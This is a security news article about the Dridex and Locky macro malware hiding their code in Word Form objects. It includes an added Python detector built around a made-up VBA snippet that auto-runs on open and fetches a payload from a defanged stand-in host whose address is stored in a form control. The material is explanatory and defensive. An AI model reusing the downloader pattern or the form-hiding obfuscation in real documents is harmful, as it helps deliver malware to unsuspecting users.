Macro Malware Dridex, Locky Using Forms to Hide Code

Researchers at Trend Micro recently observed a change in the Dridex and Locky macro malware families, which are now using Form objects inside their macros to obfuscate the malicious code.

Spotted in February, Locky was immediately associated with Dridex because it used the same infiltration technique as the notorious banking Trojan, namely malicious macros embedded in Word documents. Although ransomware relying on macros for distribution had been observed before, the latest change in both malware families appears to tighten the connection between them.

In February, researchers at Palo Alto Networks observed around 446,000 individual sessions containing the Bartallex macro downloader, which in turn dropped Locky on compromised systems. The large number of sessions also suggested that the ransomware's operators were putting significant effort into pushing Locky to the top of the ransomware charts.

In a recent blog post, Trend Micro's Wilson Agad revealed that the ransomware's authors are also focused on improving their malicious creation. Locky was observed using Form objects in its macros to obfuscate the malicious code, a change that could help adversaries hide the malicious activity performed on target networks or systems.

The use of malicious macros to achieve high infection rates is an attack method that was very popular about a decade ago, but which went almost extinct after Microsoft disabled macros by default in Office 2007. In the past few years, however, it has become a popular attack technique once again, used mainly by malware such as Dridex and Rovnix, as well as by the enterprise-oriented Bartallex.

Until recently, macro malware relied on easy-to-implement scripts placed directly in the macro module to download and execute the malicious payload. Those scripts required the user to manually enable macros before the malware could run, and Form objects, which are the windows or dialog boxes that make up part of an application's user interface, are no different in that respect: the user still has to enable macros.

As Agad explains, however, the new technique also requires the macro to access the shellcode, and it is harder to implement than a plain script. The installation routine itself, the researcher adds, isn't necessarily changed by the use of Forms.
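The obfuscation Agad describes is easiest to understand by contrast with the scanners it defeats. The following Python is an added example, not code from the Trend Micro post or from the malware itself. It assumes (the article does not spell out the exact mechanism, so this is an assumption) that the macro keeps its download location in a UserForm control property and reads it at run time, and it shows that a scanner which only greps the VBA module text finds no URL, while one that also resolves the form properties the code touches recovers it. The module text, the stored property values, the `UserForm1.Label1.Caption` name and the `example.invalid` address are all constructed for the example.

```python
import re

# Constructed VBA module text, modelled on the pattern described in the article:
# the download location has been moved out of the module and into a UserForm
# control property, so it never appears in the macro source itself.
VBA_MODULE = r'''
Private Sub Document_Open()
    Dim u As String
    u = UserForm1.Label1.Caption        ' payload location pulled from the form
    Dim o As Object
    Set o = CreateObject("MSXML2.XMLHTTP")
    o.Open "GET", u, False
    o.send
    ' write o.responseBody to disk and execute it (omitted here)
End Sub
'''

# Constructed stand-in for the form's stored control properties. In a real
# document these live in the UserForm's binary streams inside the OLE file,
# not in the module source, which is why module-only scanners miss them.
FORM_CONTROLS = {
    "UserForm1.Label1.Caption": "hxxp://example.invalid/payload.exe",
    "UserForm1.TextBox1.Text": "",
}

URL_RE = re.compile(r"\bh(?:xx|tt)ps?://\S+", re.I)
AUTOEXEC_RE = re.compile(
    r"\bSub\s+(?:AutoOpen|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b",
    re.I,
)
# Form.Control.Property references inside the module, e.g. UserForm1.Label1.Caption
CONTROL_PROP_RE = re.compile(
    r"\b([A-Za-z_]\w*\.[A-Za-z_]\w*\.(?:Caption|Tag|Text|Value|ControlTipText))\b"
)


def find_urls(text):
    """Return URLs (including defanged hxxp forms) found in a text blob."""
    return URL_RE.findall(text)


def control_properties_read(module):
    """Form control properties the macro code reads, sorted and de-duplicated."""
    return sorted({m.group(1) for m in CONTROL_PROP_RE.finditer(module)})


def assess(module, controls):
    """Combine the module text with the form's stored properties and score it.

    A naive scanner that greps only `module` finds no URL here; resolving the
    control properties the code touches recovers the payload location.
    """
    auto_exec = bool(AUTOEXEC_RE.search(module))
    props = control_properties_read(module)
    urls = find_urls(module)
    for prop in props:
        urls.extend(find_urls(controls.get(prop, "")))
    # Auto-executing code that pulls data out of a form is itself a signal,
    # even when the stored value is not a recognisable URL.
    suspicious = urls or (auto_exec and props)
    return {
        "auto_exec": auto_exec,
        "reads_form_controls": props,
        "urls": urls,
        "verdict": "suspicious" if suspicious else "no indicators",
    }


if __name__ == "__main__":
    print("module-only URLs:", find_urls(VBA_MODULE))
    print(assess(VBA_MODULE, FORM_CONTROLS))
```

In a real analysis the `FORM_CONTROLS` values would be pulled from the document's UserForm streams rather than typed in; olevba from oletools, for example, dumps UserForm strings alongside the macro source, which is what makes this cross-referencing possible on actual samples.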

To infect systems, attackers rely on users opening a booby-trapped Word document, attached to a malicious email, that carries the malicious macros. Since the targets are typically employees who deal with form-based documents on a daily basis, the chances of a successful infection are higher.

As Proofpoint revealed in the recently published Human Factor 2016 report, attackers are increasingly relying on people becoming their unwitting accomplices in attempts to steal information and money. A very large portion of last year’s attacks relied on social engineering, with 99.7 percent of attachment documents in spam email campaigns requiring human interaction to deliver the malicious payload.

Given that social engineering is trending as a malware delivery method, it is no surprise that ransomware authors have adopted it too. Locky, which currently affects mostly users in Germany, Japan, and the United States, appears to be the first ransomware to copy the malicious-macro delivery commonly seen in Dridex, and to adopt the use of Forms so early.

“Awareness of such threats and their behavior is one of the initial steps in order to combat their risks. It’s also important to not enable macros from email attachments as this can add another layer of protection to prevent the download of malicious files on the system. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources,” Agad concludes.